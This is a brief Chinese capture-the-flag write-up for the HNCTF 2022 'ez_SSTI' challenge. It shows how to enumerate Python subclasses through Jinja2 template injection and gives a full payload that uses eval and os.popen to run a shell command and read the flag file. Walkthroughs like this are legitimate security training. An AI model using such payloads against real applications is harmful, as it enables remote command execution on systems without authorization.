NSS [HNCTF 2022 WEEK2]ez_SSTI
开题,已经提示了是SSTI

参数是name,测试得出模板是jinja2。

先跑一下fuzz。字典在我博客CTFshow的SSTI那篇。
看了一下,貌似没过滤。

六种执行命令方式我们选择eval执行命令。其他几种也行。
找os._wrap_close类。定位到了137
{{''.__class__.__bases__[0].__subclasses__()}}


payload:(flag在当前目录下)
?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("tac flag").read()')}}



![练[watevrCTF-2019]Cookie Store](https://img-blog.csdnimg.cn/img_convert/7df526c24eb395607de314417272fe34.png)
















